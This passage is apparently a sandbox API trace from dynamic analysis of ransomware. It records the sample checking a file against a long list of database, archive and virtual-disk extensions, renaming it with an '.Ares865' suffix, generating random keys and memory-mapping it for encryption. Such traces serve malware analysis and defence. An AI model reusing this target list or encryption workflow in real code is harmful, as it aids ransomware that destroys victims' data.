(lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm") returned 84 [0063.710] lstrcpyW (in: lpString1=0x2cce48e, lpString2="SoftBlue.jpg" | out: lpString1="SoftBlue.jpg") returned="SoftBlue.jpg" [0063.710] lstrlenW (lpString="SoftBlue.jpg") returned 12 [0063.710] lstrlenW (lpString="Ares865") returned 7 [0063.710] lstrcmpiW (lpString1="lue.jpg", lpString2="Ares865") returned 1 [0063.710] lstrlenW (lpString=".dll") returned 4 [0063.710] lstrcmpiW (lpString1="SoftBlue.jpg", lpString2=".dll") returned 1 [0063.710] lstrlenW (lpString=".lnk") returned 4 [0063.710] lstrcmpiW (lpString1="SoftBlue.jpg", lpString2=".lnk") returned 1 [0063.710] lstrlenW (lpString=".ini") returned 4 [0063.710] lstrcmpiW (lpString1="SoftBlue.jpg", lpString2=".ini") returned 1 [0063.710] lstrlenW (lpString=".sys") returned 4 [0063.710] lstrcmpiW (lpString1="SoftBlue.jpg", lpString2=".sys") returned 1 [0063.710] lstrlenW (lpString="SoftBlue.jpg") returned 12 [0063.710] lstrlenW (lpString="bak") returned 3 [0063.710] lstrcmpiW (lpString1="jpg", lpString2="bak") returned 1 [0063.710] lstrlenW (lpString="ba_") returned 3 [0063.710] lstrcmpiW (lpString1="jpg", lpString2="ba_") returned 1 [0063.710] lstrlenW (lpString="dbb") returned 3 [0063.710] lstrcmpiW (lpString1="jpg", lpString2="dbb") returned 1 [0063.710] lstrlenW (lpString="vmdk") returned 4 [0063.710] lstrcmpiW (lpString1=".jpg", lpString2="vmdk") returned -1 [0063.710] lstrlenW (lpString="rar") returned 3 [0063.711] lstrcmpiW (lpString1="jpg", lpString2="rar") returned -1 [0063.711] lstrlenW (lpString="zip") returned 3 [0063.711] lstrcmpiW (lpString1="jpg", lpString2="zip") returned -1 [0063.711] lstrlenW (lpString="tgz") returned 3 [0063.711] lstrcmpiW (lpString1="jpg", lpString2="tgz") returned -1 [0063.711] lstrlenW (lpString="vbox") returned 4 [0063.711] lstrcmpiW (lpString1=".jpg", lpString2="vbox") returned -1 [0063.711] lstrlenW (lpString="vdi") returned 3 [0063.711] lstrcmpiW (lpString1="jpg", lpString2="vdi") returned -1 [0063.711] lstrlenW (lpString="vhd") returned 3 [0063.711] lstrcmpiW (lpString1="jpg", lpString2="vhd") returned -1 [0063.711] lstrlenW (lpString="vhdx") returned 4 [0063.711] lstrcmpiW (lpString1=".jpg", lpString2="vhdx") returned -1 [0063.711] lstrlenW (lpString="avhd") returned 4 [0063.711] lstrcmpiW (lpString1=".jpg", lpString2="avhd") returned -1 [0063.711] lstrlenW (lpString="db") returned 2 [0063.711] lstrcmpiW (lpString1="pg", lpString2="db") returned 1 [0063.711] lstrlenW (lpString="db2") returned 3 [0063.711] lstrcmpiW (lpString1="jpg", lpString2="db2") returned 1 [0063.711] lstrlenW (lpString="db3") returned 3 [0063.711] lstrcmpiW (lpString1="jpg", lpString2="db3") returned 1 [0063.711] lstrlenW (lpString="dbf") returned 3 [0063.711] lstrcmpiW (lpString1="jpg", lpString2="dbf") returned 1 [0063.711] lstrlenW (lpString="mdf") returned 3 [0063.711] lstrcmpiW (lpString1="jpg", lpString2="mdf") returned -1 [0063.711] lstrlenW (lpString="mdb") returned 3 [0063.711] lstrcmpiW (lpString1="jpg", lpString2="mdb") returned -1 [0063.711] lstrlenW (lpString="sql") returned 3 [0063.711] lstrcmpiW (lpString1="jpg", lpString2="sql") returned -1 [0063.711] lstrlenW (lpString="sqlite") returned 6 [0063.711] lstrcmpiW (lpString1="ue.jpg", lpString2="sqlite") returned 1 [0063.711] lstrlenW (lpString="sqlite3") returned 7 [0063.711] lstrcmpiW (lpString1="lue.jpg", lpString2="sqlite3") returned -1 [0063.711] lstrlenW (lpString="sqlitedb") returned 8 [0063.711] lstrcmpiW (lpString1="Blue.jpg", lpString2="sqlitedb") returned -1 [0063.711] lstrlenW (lpString="xml") returned 3 [0063.711] lstrcmpiW (lpString1="jpg", lpString2="xml") returned -1 [0063.712] lstrlenW (lpString="$er") returned 3 [0063.712] lstrcmpiW (lpString1="jpg", lpString2="$er") returned 1 [0063.712] lstrlenW (lpString="4dd") returned 3 [0063.712] lstrcmpiW (lpString1="jpg", lpString2="4dd") returned 1 [0063.712] lstrlenW (lpString="4dl") returned 3 [0063.712] lstrcmpiW (lpString1="jpg", lpString2="4dl") returned 1 [0063.712] lstrlenW (lpString="^^^") returned 3 [0063.712] lstrcmpiW (lpString1="jpg", lpString2="^^^") returned 1 [0063.712] lstrlenW (lpString="abs") returned 3 [0063.712] lstrcmpiW (lpString1="jpg", lpString2="abs") returned 1 [0063.712] lstrlenW (lpString="abx") returned 3 [0063.712] lstrcmpiW (lpString1="jpg", lpString2="abx") returned 1 [0063.712] lstrlenW (lpString="accdb") returned 5 [0063.712] lstrcmpiW (lpString1="e.jpg", lpString2="accdb") returned 1 [0063.712] lstrlenW (lpString="accdc") returned 5 [0063.712] lstrcmpiW (lpString1="e.jpg", lpString2="accdc") returned 1 [0063.712] lstrlenW (lpString="accde") returned 5 [0063.712] lstrcmpiW (lpString1="e.jpg", lpString2="accde") returned 1 [0063.712] lstrlenW (lpString="accdr") returned 5 [0063.712] lstrcmpiW (lpString1="e.jpg", lpString2="accdr") returned 1 [0063.712] lstrlenW (lpString="accdt") returned 5 [0063.712] lstrcmpiW (lpString1="e.jpg", lpString2="accdt") returned 1 [0063.712] lstrlenW (lpString="accdw") returned 5 [0063.712] lstrcmpiW (lpString1="e.jpg", lpString2="accdw") returned 1 [0063.712] lstrlenW (lpString="accft") returned 5 [0063.712] lstrcmpiW (lpString1="e.jpg", lpString2="accft") returned 1 [0063.712] lstrlenW (lpString="adb") returned 3 [0063.712] lstrcmpiW (lpString1="jpg", lpString2="adb") returned 1 [0063.712] lstrlenW (lpString="adb") returned 3 [0063.712] lstrcmpiW (lpString1="jpg", lpString2="adb") returned 1 [0063.712] lstrlenW (lpString="ade") returned 3 [0063.712] lstrcmpiW (lpString1="jpg", lpString2="ade") returned 1 [0063.712] lstrlenW (lpString="adf") returned 3 [0063.712] lstrcmpiW (lpString1="jpg", lpString2="adf") returned 1 [0063.712] lstrlenW (lpString="adn") returned 3 [0063.712] lstrcmpiW (lpString1="jpg", lpString2="adn") returned 1 [0063.712] lstrlenW (lpString="adp") returned 3 [0063.712] lstrcmpiW (lpString1="jpg", lpString2="adp") returned 1 [0063.713] lstrlenW (lpString="alf") returned 3 [0063.713] lstrcmpiW (lpString1="jpg", lpString2="alf") returned 1 [0063.713] lstrlenW (lpString="ask") returned 3 [0063.713] lstrcmpiW (lpString1="jpg", lpString2="ask") returned 1 [0063.713] lstrlenW (lpString="btr") returned 3 [0063.713] lstrcmpiW (lpString1="jpg", lpString2="btr") returned 1 [0063.713] lstrlenW (lpString="cat") returned 3 [0063.713] lstrcmpiW (lpString1="jpg", lpString2="cat") returned 1 [0063.713] lstrlenW (lpString="cdb") returned 3 [0063.713] lstrcmpiW (lpString1="jpg", lpString2="cdb") returned 1 [0063.713] lstrlenW (lpString="ckp") returned 3 [0063.713] lstrcmpiW (lpString1="jpg", lpString2="ckp") returned 1 [0063.713] lstrlenW (lpString="cma") returned 3 [0063.713] lstrcmpiW (lpString1="jpg", lpString2="cma") returned 1 [0063.713] lstrlenW (lpString="cpd") returned 3 [0063.713] lstrcmpiW (lpString1="jpg", lpString2="cpd") returned 1 [0063.713] lstrlenW (lpString="dacpac") returned 6 [0063.713] lstrcmpiW (lpString1="ue.jpg", lpString2="dacpac") returned 1 [0063.713] lstrlenW (lpString="dad") returned 3 [0063.713] lstrcmpiW (lpString1="jpg", lpString2="dad") returned 1 [0063.713] lstrlenW (lpString="dadiagrams") returned 10 [0063.713] lstrcmpiW (lpString1="ftBlue.jpg", lpString2="dadiagrams") returned 1 [0063.713] lstrlenW (lpString="daschema") returned 8 [0063.713] lstrcmpiW (lpString1="Blue.jpg", lpString2="daschema") returned -1 [0063.713] lstrlenW (lpString="db-journal") returned 10 [0063.713] lstrcmpiW (lpString1="ftBlue.jpg", lpString2="db-journal") returned 1 [0063.713] lstrlenW (lpString="db-shm") returned 6 [0063.713] lstrcmpiW (lpString1="ue.jpg", lpString2="db-shm") returned 1 [0063.713] lstrlenW (lpString="db-wal") returned 6 [0063.713] lstrcmpiW (lpString1="ue.jpg", lpString2="db-wal") returned 1 [0063.713] lstrlenW (lpString="dbc") returned 3 [0063.713] lstrcmpiW (lpString1="jpg", lpString2="dbc") returned 1 [0063.713] lstrlenW (lpString="dbs") returned 3 [0063.713] lstrcmpiW (lpString1="jpg", lpString2="dbs") returned 1 [0063.713] lstrlenW (lpString="dbt") returned 3 [0063.713] lstrcmpiW (lpString1="jpg", lpString2="dbt") returned 1 [0063.713] lstrlenW (lpString="dbv") returned 3 [0063.714] lstrcmpiW (lpString1="jpg", lpString2="dbv") returned 1 [0063.714] lstrlenW (lpString="dbx") returned 3 [0063.714] lstrcmpiW (lpString1="jpg", lpString2="dbx") returned 1 [0063.714] lstrlenW (lpString="dcb") returned 3 [0063.714] lstrcmpiW (lpString1="jpg", lpString2="dcb") returned 1 [0063.714] lstrlenW (lpString="dct") returned 3 [0063.714] lstrcmpiW (lpString1="jpg", lpString2="dct") returned 1 [0063.714] lstrlenW (lpString="dcx") returned 3 [0063.714] lstrcmpiW (lpString1="jpg", lpString2="dcx") returned 1 [0063.714] lstrlenW (lpString="ddl") returned 3 [0063.714] lstrcmpiW (lpString1="jpg", lpString2="ddl") returned 1 [0063.714] lstrlenW (lpString="dlis") returned 4 [0063.714] lstrcmpiW (lpString1=".jpg", lpString2="dlis") returned -1 [0063.714] lstrlenW (lpString="dp1") returned 3 [0063.714] lstrcmpiW (lpString1="jpg", lpString2="dp1") returned 1 [0063.714] lstrlenW (lpString="dqy") returned 3 [0063.714] lstrcmpiW (lpString1="jpg", lpString2="dqy") returned 1 [0063.714] lstrlenW (lpString="dsk") returned 3 [0063.714] lstrcmpiW (lpString1="jpg", lpString2="dsk") returned 1 [0063.714] lstrlenW (lpString="dsn") returned 3 [0063.714] lstrcmpiW (lpString1="jpg", lpString2="dsn") returned 1 [0063.714] lstrlenW (lpString="dtsx") returned 4 [0063.714] lstrcmpiW (lpString1=".jpg", lpString2="dtsx") returned -1 [0063.714] lstrlenW (lpString="dxl") returned 3 [0063.714] lstrcmpiW (lpString1="jpg", lpString2="dxl") returned 1 [0063.714] lstrlenW (lpString="eco") returned 3 [0063.714] lstrcmpiW (lpString1="jpg", lpString2="eco") returned 1 [0063.714] lstrlenW (lpString="ecx") returned 3 [0063.714] lstrcmpiW (lpString1="jpg", lpString2="ecx") returned 1 [0063.714] lstrlenW (lpString="edb") returned 3 [0063.714] lstrcmpiW (lpString1="jpg", lpString2="edb") returned 1 [0063.714] lstrlenW (lpString="epim") returned 4 [0063.714] lstrcmpiW (lpString1=".jpg", lpString2="epim") returned -1 [0063.714] lstrlenW (lpString="fcd") returned 3 [0063.714] lstrcmpiW (lpString1="jpg", lpString2="fcd") returned 1 [0063.714] lstrlenW (lpString="fdb") returned 3 [0063.714] lstrcmpiW (lpString1="jpg", lpString2="fdb") returned 1 [0063.714] lstrlenW (lpString="fic") returned 3 [0063.715] lstrcmpiW (lpString1="jpg", lpString2="fic") returned 1 [0063.715] lstrlenW (lpString="flexolibrary") returned 12 [0063.715] lstrlenW (lpString="fm5") returned 3 [0063.715] lstrcmpiW (lpString1="jpg", lpString2="fm5") returned 1 [0063.715] lstrlenW (lpString="fmp") returned 3 [0063.715] lstrcmpiW (lpString1="jpg", lpString2="fmp") returned 1 [0063.715] lstrlenW (lpString="fmp12") returned 5 [0063.715] lstrcmpiW (lpString1="e.jpg", lpString2="fmp12") returned -1 [0063.715] lstrlenW (lpString="fmpsl") returned 5 [0063.715] lstrcmpiW (lpString1="e.jpg", lpString2="fmpsl") returned -1 [0063.715] lstrlenW (lpString="fol") returned 3 [0063.715] lstrcmpiW (lpString1="jpg", lpString2="fol") returned 1 [0063.715] lstrlenW (lpString="fp3") returned 3 [0063.715] lstrcmpiW (lpString1="jpg", lpString2="fp3") returned 1 [0063.715] lstrlenW (lpString="fp4") returned 3 [0063.715] lstrcmpiW (lpString1="jpg", lpString2="fp4") returned 1 [0063.715] lstrlenW (lpString="fp5") returned 3 [0063.715] lstrcmpiW (lpString1="jpg", lpString2="fp5") returned 1 [0063.715] lstrlenW (lpString="fp7") returned 3 [0063.715] lstrcmpiW (lpString1="jpg", lpString2="fp7") returned 1 [0063.715] lstrlenW (lpString="fpt") returned 3 [0063.715] lstrcmpiW (lpString1="jpg", lpString2="fpt") returned 1 [0063.715] lstrlenW (lpString="frm") returned 3 [0063.715] lstrcmpiW (lpString1="jpg", lpString2="frm") returned 1 [0063.715] lstrlenW (lpString="gdb") returned 3 [0063.715] lstrcmpiW (lpString1="jpg", lpString2="gdb") returned 1 [0063.715] lstrlenW (lpString="gdb") returned 3 [0063.715] lstrcmpiW (lpString1="jpg", lpString2="gdb") returned 1 [0063.715] lstrlenW (lpString="grdb") returned 4 [0063.715] lstrcmpiW (lpString1=".jpg", lpString2="grdb") returned -1 [0063.715] lstrlenW (lpString="gwi") returned 3 [0063.715] lstrcmpiW (lpString1="jpg", lpString2="gwi") returned 1 [0063.715] lstrlenW (lpString="hdb") returned 3 [0063.715] lstrcmpiW (lpString1="jpg", lpString2="hdb") returned 1 [0063.715] lstrlenW (lpString="his") returned 3 [0063.715] lstrcmpiW (lpString1="jpg", lpString2="his") returned 1 [0063.715] lstrlenW (lpString="ib") returned 2 [0063.715] lstrcmpiW (lpString1="pg", lpString2="ib") returned 1 [0063.716] lstrlenW (lpString="idb") returned 3 [0063.716] lstrcmpiW (lpString1="jpg", lpString2="idb") returned 1 [0063.716] lstrlenW (lpString="ihx") returned 3 [0063.716] lstrcmpiW (lpString1="jpg", lpString2="ihx") returned 1 [0063.716] lstrlenW (lpString="itdb") returned 4 [0063.716] lstrcmpiW (lpString1=".jpg", lpString2="itdb") returned -1 [0063.716] lstrlenW (lpString="itw") returned 3 [0063.716] lstrcmpiW (lpString1="jpg", lpString2="itw") returned 1 [0063.716] lstrlenW (lpString="jet") returned 3 [0063.716] lstrcmpiW (lpString1="jpg", lpString2="jet") returned 1 [0063.716] lstrlenW (lpString="jtx") returned 3 [0063.716] lstrcmpiW (lpString1="jpg", lpString2="jtx") returned -1 [0063.716] lstrlenW (lpString="kdb") returned 3 [0063.716] lstrcmpiW (lpString1="jpg", lpString2="kdb") returned -1 [0063.716] lstrlenW (lpString="kexi") returned 4 [0063.716] lstrcmpiW (lpString1=".jpg", lpString2="kexi") returned -1 [0063.716] lstrlenW (lpString="kexic") returned 5 [0063.716] lstrcmpiW (lpString1="e.jpg", lpString2="kexic") returned -1 [0063.716] lstrlenW (lpString="kexis") returned 5 [0063.716] lstrcmpiW (lpString1="e.jpg", lpString2="kexis") returned -1 [0063.716] lstrlenW (lpString="lgc") returned 3 [0063.716] lstrcmpiW (lpString1="jpg", lpString2="lgc") returned -1 [0063.716] lstrlenW (lpString="lwx") returned 3 [0063.716] lstrcmpiW (lpString1="jpg", lpString2="lwx") returned -1 [0063.716] lstrlenW (lpString="maf") returned 3 [0063.716] lstrcmpiW (lpString1="jpg", lpString2="maf") returned -1 [0063.716] lstrlenW (lpString="maq") returned 3 [0063.716] lstrcmpiW (lpString1="jpg", lpString2="maq") returned -1 [0063.716] lstrlenW (lpString="mar") returned 3 [0063.716] lstrcmpiW (lpString1="jpg", lpString2="mar") returned -1 [0063.716] lstrlenW (lpString="marshal") returned 7 [0063.716] lstrcmpiW (lpString1="lue.jpg", lpString2="marshal") returned -1 [0063.716] lstrlenW (lpString="mas") returned 3 [0063.716] lstrcmpiW (lpString1="jpg", lpString2="mas") returned -1 [0063.716] lstrlenW (lpString="mav") returned 3 [0063.716] lstrcmpiW (lpString1="jpg", lpString2="mav") returned -1 [0063.716] lstrlenW (lpString="maw") returned 3 [0063.717] lstrcmpiW (lpString1="jpg", lpString2="maw") returned -1 [0063.717] lstrlenW (lpString="mdbhtml") returned 7 [0063.717] lstrcmpiW (lpString1="lue.jpg", lpString2="mdbhtml") returned -1 [0063.717] lstrlenW (lpString="mdn") returned 3 [0063.717] lstrcmpiW (lpString1="jpg", lpString2="mdn") returned -1 [0063.717] lstrlenW (lpString="mdt") returned 3 [0063.717] lstrcmpiW (lpString1="jpg", lpString2="mdt") returned -1 [0063.717] lstrlenW (lpString="mfd") returned 3 [0063.717] lstrcmpiW (lpString1="jpg", lpString2="mfd") returned -1 [0063.717] lstrlenW (lpString="mpd") returned 3 [0063.717] lstrcmpiW (lpString1="jpg", lpString2="mpd") returned -1 [0063.717] lstrlenW (lpString="mrg") returned 3 [0063.717] lstrcmpiW (lpString1="jpg", lpString2="mrg") returned -1 [0063.717] lstrlenW (lpString="mud") returned 3 [0063.717] lstrcmpiW (lpString1="jpg", lpString2="mud") returned -1 [0063.717] lstrlenW (lpString="mwb") returned 3 [0063.717] lstrcmpiW (lpString1="jpg", lpString2="mwb") returned -1 [0063.717] lstrlenW (lpString="myd") returned 3 [0063.717] lstrcmpiW (lpString1="jpg", lpString2="myd") returned -1 [0063.717] lstrlenW (lpString="ndf") returned 3 [0063.717] lstrcmpiW (lpString1="jpg", lpString2="ndf") returned -1 [0063.717] lstrlenW (lpString="nnt") returned 3 [0063.717] lstrcmpiW (lpString1="jpg", lpString2="nnt") returned -1 [0063.717] lstrlenW (lpString="nrmlib") returned 6 [0063.717] lstrcmpiW (lpString1="ue.jpg", lpString2="nrmlib") returned 1 [0063.717] lstrlenW (lpString="ns2") returned 3 [0063.717] lstrcmpiW (lpString1="jpg", lpString2="ns2") returned -1 [0063.717] lstrlenW (lpString="ns3") returned 3 [0063.717] lstrcmpiW (lpString1="jpg", lpString2="ns3") returned -1 [0063.717] lstrlenW (lpString="ns4") returned 3 [0063.717] lstrcmpiW (lpString1="jpg", lpString2="ns4") returned -1 [0063.717] lstrlenW (lpString="nsf") returned 3 [0063.717] lstrcmpiW (lpString1="jpg", lpString2="nsf") returned -1 [0063.717] lstrlenW (lpString="nv") returned 2 [0063.717] lstrcmpiW (lpString1="pg", lpString2="nv") returned 1 [0063.717] lstrlenW (lpString="nv2") returned 3 [0063.717] lstrcmpiW (lpString1="jpg", lpString2="nv2") returned -1 [0063.717] lstrlenW (lpString="nwdb") returned 4 [0063.718] lstrcmpiW (lpString1=".jpg", lpString2="nwdb") returned -1 [0063.718] lstrlenW (lpString="nyf") returned 3 [0063.718] lstrcmpiW (lpString1="jpg", lpString2="nyf") returned -1 [0063.718] lstrlenW (lpString="odb") returned 3 [0063.718] lstrcmpiW (lpString1="jpg", lpString2="odb") returned -1 [0063.718] lstrlenW (lpString="odb") returned 3 [0063.718] lstrcmpiW (lpString1="jpg", lpString2="odb") returned -1 [0063.718] lstrlenW (lpString="oqy") returned 3 [0063.718] lstrcmpiW (lpString1="jpg", lpString2="oqy") returned -1 [0063.718] lstrlenW (lpString="ora") returned 3 [0063.718] lstrcmpiW (lpString1="jpg", lpString2="ora") returned -1 [0063.718] lstrlenW (lpString="orx") returned 3 [0063.718] lstrcmpiW (lpString1="jpg", lpString2="orx") returned -1 [0063.718] lstrlenW (lpString="owc") returned 3 [0063.718] lstrcmpiW (lpString1="jpg", lpString2="owc") returned -1 [0063.718] lstrlenW (lpString="p96") returned 3 [0063.718] lstrcmpiW (lpString1="jpg", lpString2="p96") returned -1 [0063.718] lstrlenW (lpString="p97") returned 3 [0063.718] lstrcmpiW (lpString1="jpg", lpString2="p97") returned -1 [0063.718] lstrlenW (lpString="pan") returned 3 [0063.718] lstrcmpiW (lpString1="jpg", lpString2="pan") returned -1 [0063.718] lstrlenW (lpString="pdb") returned 3 [0063.718] lstrcmpiW (lpString1="jpg", lpString2="pdb") returned -1 [0063.718] lstrlenW (lpString="pdm") returned 3 [0063.718] lstrcmpiW (lpString1="jpg", lpString2="pdm") returned -1 [0063.718] lstrlenW (lpString="pnz") returned 3 [0063.718] lstrcmpiW (lpString1="jpg", lpString2="pnz") returned -1 [0063.718] lstrlenW (lpString="qry") returned 3 [0063.718] lstrcmpiW (lpString1="jpg", lpString2="qry") returned -1 [0063.718] lstrlenW (lpString="qvd") returned 3 [0063.718] lstrcmpiW (lpString1="jpg", lpString2="qvd") returned -1 [0063.718] lstrlenW (lpString="rbf") returned 3 [0063.718] lstrcmpiW (lpString1="jpg", lpString2="rbf") returned -1 [0063.718] lstrlenW (lpString="rctd") returned 4 [0063.718] lstrcmpiW (lpString1=".jpg", lpString2="rctd") returned -1 [0063.718] lstrlenW (lpString="rod") returned 3 [0063.718] lstrcmpiW (lpString1="jpg", lpString2="rod") returned -1 [0063.719] lstrlenW (lpString="rodx") returned 4 [0063.719] lstrcmpiW (lpString1=".jpg", lpString2="rodx") returned -1 [0063.719] lstrlenW (lpString="rpd") returned 3 [0063.719] lstrcmpiW (lpString1="jpg", lpString2="rpd") returned -1 [0063.719] lstrlenW (lpString="rsd") returned 3 [0063.719] lstrcmpiW (lpString1="jpg", lpString2="rsd") returned -1 [0063.719] lstrlenW (lpString="sas7bdat") returned 8 [0063.719] lstrcmpiW (lpString1="Blue.jpg", lpString2="sas7bdat") returned -1 [0063.719] lstrlenW (lpString="sbf") returned 3 [0063.719] lstrcmpiW (lpString1="jpg", lpString2="sbf") returned -1 [0063.719] lstrlenW (lpString="scx") returned 3 [0063.719] lstrcmpiW (lpString1="jpg", lpString2="scx") returned -1 [0063.719] lstrlenW (lpString="sdb") returned 3 [0063.719] lstrcmpiW (lpString1="jpg", lpString2="sdb") returned -1 [0063.719] lstrlenW (lpString="sdc") returned 3 [0063.719] lstrcmpiW (lpString1="jpg", lpString2="sdc") returned -1 [0063.719] lstrlenW (lpString="sdf") returned 3 [0063.719] lstrcmpiW (lpString1="jpg", lpString2="sdf") returned -1 [0063.719] lstrlenW (lpString="sis") returned 3 [0063.719] lstrcmpiW (lpString1="jpg", lpString2="sis") returned -1 [0063.719] lstrlenW (lpString="spq") returned 3 [0063.719] lstrcmpiW (lpString1="jpg", lpString2="spq") returned -1 [0063.719] lstrlenW (lpString="te") returned 2 [0063.719] lstrcmpiW (lpString1="pg", lpString2="te") returned -1 [0063.719] lstrlenW (lpString="teacher") returned 7 [0063.719] lstrcmpiW (lpString1="lue.jpg", lpString2="teacher") returned -1 [0063.719] lstrlenW (lpString="tmd") returned 3 [0063.719] lstrcmpiW (lpString1="jpg", lpString2="tmd") returned -1 [0063.719] lstrlenW (lpString="tps") returned 3 [0063.719] lstrcmpiW (lpString1="jpg", lpString2="tps") returned -1 [0063.719] lstrlenW (lpString="trc") returned 3 [0063.719] lstrcmpiW (lpString1="jpg", lpString2="trc") returned -1 [0063.719] lstrlenW (lpString="trc") returned 3 [0063.719] lstrcmpiW (lpString1="jpg", lpString2="trc") returned -1 [0063.719] lstrlenW (lpString="trm") returned 3 [0063.719] lstrcmpiW (lpString1="jpg", lpString2="trm") returned -1 [0063.719] lstrlenW (lpString="udb") returned 3 [0063.719] lstrcmpiW (lpString1="jpg", lpString2="udb") returned -1 [0063.720] lstrlenW (lpString="udl") returned 3 [0063.720] lstrcmpiW (lpString1="jpg", lpString2="udl") returned -1 [0063.720] lstrlenW (lpString="usr") returned 3 [0063.720] lstrcmpiW (lpString1="jpg", lpString2="usr") returned -1 [0063.720] lstrlenW (lpString="v12") returned 3 [0063.720] lstrcmpiW (lpString1="jpg", lpString2="v12") returned -1 [0063.720] lstrlenW (lpString="vis") returned 3 [0063.720] lstrcmpiW (lpString1="jpg", lpString2="vis") returned -1 [0063.720] lstrlenW (lpString="vpd") returned 3 [0063.720] lstrcmpiW (lpString1="jpg", lpString2="vpd") returned -1 [0063.720] lstrlenW (lpString="vvv") returned 3 [0063.720] lstrcmpiW (lpString1="jpg", lpString2="vvv") returned -1 [0063.720] lstrlenW (lpString="wdb") returned 3 [0063.720] lstrcmpiW (lpString1="jpg", lpString2="wdb") returned -1 [0063.720] lstrlenW (lpString="wmdb") returned 4 [0063.720] lstrcmpiW (lpString1=".jpg", lpString2="wmdb") returned -1 [0063.720] lstrlenW (lpString="wrk") returned 3 [0063.720] lstrcmpiW (lpString1="jpg", lpString2="wrk") returned -1 [0063.720] lstrlenW (lpString="xdb") returned 3 [0063.720] lstrcmpiW (lpString1="jpg", lpString2="xdb") returned -1 [0063.720] lstrlenW (lpString="xld") returned 3 [0063.720] lstrcmpiW (lpString1="jpg", lpString2="xld") returned -1 [0063.720] lstrlenW (lpString="xmlff") returned 5 [0063.720] lstrcmpiW (lpString1="e.jpg", lpString2="xmlff") returned -1 [0063.720] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg.Ares865") returned 91 [0063.720] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\stationery\\softblue.jpg"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\stationery\\softblue.jpg.ares865"), dwFlags=0x1) returned 1 [0063.721] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\stationery\\softblue.jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x154 [0063.721] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=10569) returned 1 [0063.721] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0063.722] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0063.722] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0063.722] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0063.722] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0063.722] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0063.723] CreateFileMappingW (hFile=0x154, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2c50, lpName=0x0) returned 0x164 [0063.724] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2c50) returned 0x190000 [0063.725] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0063.726] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0063.726] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0063.726] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0063.726] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0063.726] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0063.726] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0063.726] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0063.726] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0063.726] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0063.727] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0063.727] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0063.727] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0063.727] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0063.727] CloseHandle (hObject=0x164) returned 1 [0063.727] CloseHandle (hObject=0x154) returned 1 [0063.727] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0063.727] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0063.727] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0063.727] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x649d3c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x649d3c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, 